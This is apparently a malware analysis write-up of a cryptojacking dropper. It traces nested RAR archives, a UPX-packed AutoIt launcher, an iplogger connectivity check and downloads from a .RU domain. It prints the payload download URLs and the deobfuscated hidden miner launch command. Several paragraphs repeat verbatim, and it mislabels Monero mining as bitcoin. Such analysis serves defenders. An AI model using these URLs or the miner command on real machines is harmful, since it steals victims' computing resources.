We begin by extracting the main executable which is a self-extracting RAR archive. The file extracted is named WINDOWS.exe and is itself another self-extracting RAR archive (RAR-ception).The file extracted from the 2nd archive is also named WINDOWS.exe and is UPX packed. A quick unpacking of this file reveals the final launcher and it's embedded AUTOIT3 script.At the time of this analysis the only file hosted on the domain was 1.bat. The other files were non-existent.

Once running, WINDOWS.exe connects to iplogger.com. If a connection is unable to be made the program will exit. This is most likely an anti-analysistrick which is easily bypassed by setting up rules to pass traffic to the domain or simply respond with what the malware is looking for from the site.Once connectivity is confirmed, WINDOWS.exe will connect to the following .RU domain and download additional files:http://porntovirt.ru/075/Security.exehttp://porntovirt.ru/075/system.exehttp://porntovirt.ru/075/1.bat





Performing a directory traversal back to the main page we are greeted with the following (blurred for article):



Clicking the button at the bottom of the page we are then greeted with the following (blurred for article):

Performing a directory traversal back to the main page we are greeted with the following (blurred for article):Clicking the button at the bottom of the page we are then greeted with the following (blurred for article):









Again, clicking the button brings us to the final location which is a redirection to a Google drive file that no longer exists. This could be remnants of a past attack hosting a malicious file.

Again, clicking the button brings us to the final location which is a redirection to a Google drive file that no longer exists. This could be remnants of a past attack hosting a malicious file.









Porn site detour aside, 1.bat is a highly obfuscated batch file which is responsible for launching the crypto mining software.





Deobfuscating this VERY long script essentially boils down to the following command:



C:\ProgramData\System32\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 --donate-level=1 -u lemoh4uk.sagmail.com -p x -t 2 -k



This will launch two instances of the mining software (it repeats the command) and connects to the MINERGATE bitcoin mining pool. We can see in red the USERID of the individual where the mined bitcoin will be distributed lemoh4uk.sagmail.com.



When running at full capacity, the two mining programs will take up significant system resources as indicated by this graph immediately after infection: Porn site detour aside, 1.bat is a highly obfuscated batch file which is responsible for launching the crypto mining software.Deobfuscating this VERY long script essentially boils down to the following command:C:\ProgramData\System32\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 --donate-level=1 -u lemoh4uk.sagmail.com -p x -t 2 -kThis will launch two instances of the mining software (it repeats the command) and connects to the MINERGATE bitcoin mining pool. We can see in red the USERID of the individual where the mined bitcoin will be distributed lemoh4uk.sagmail.com.When running at full capacity, the two mining programs will take up significant system resources as indicated by this graph immediately after infection: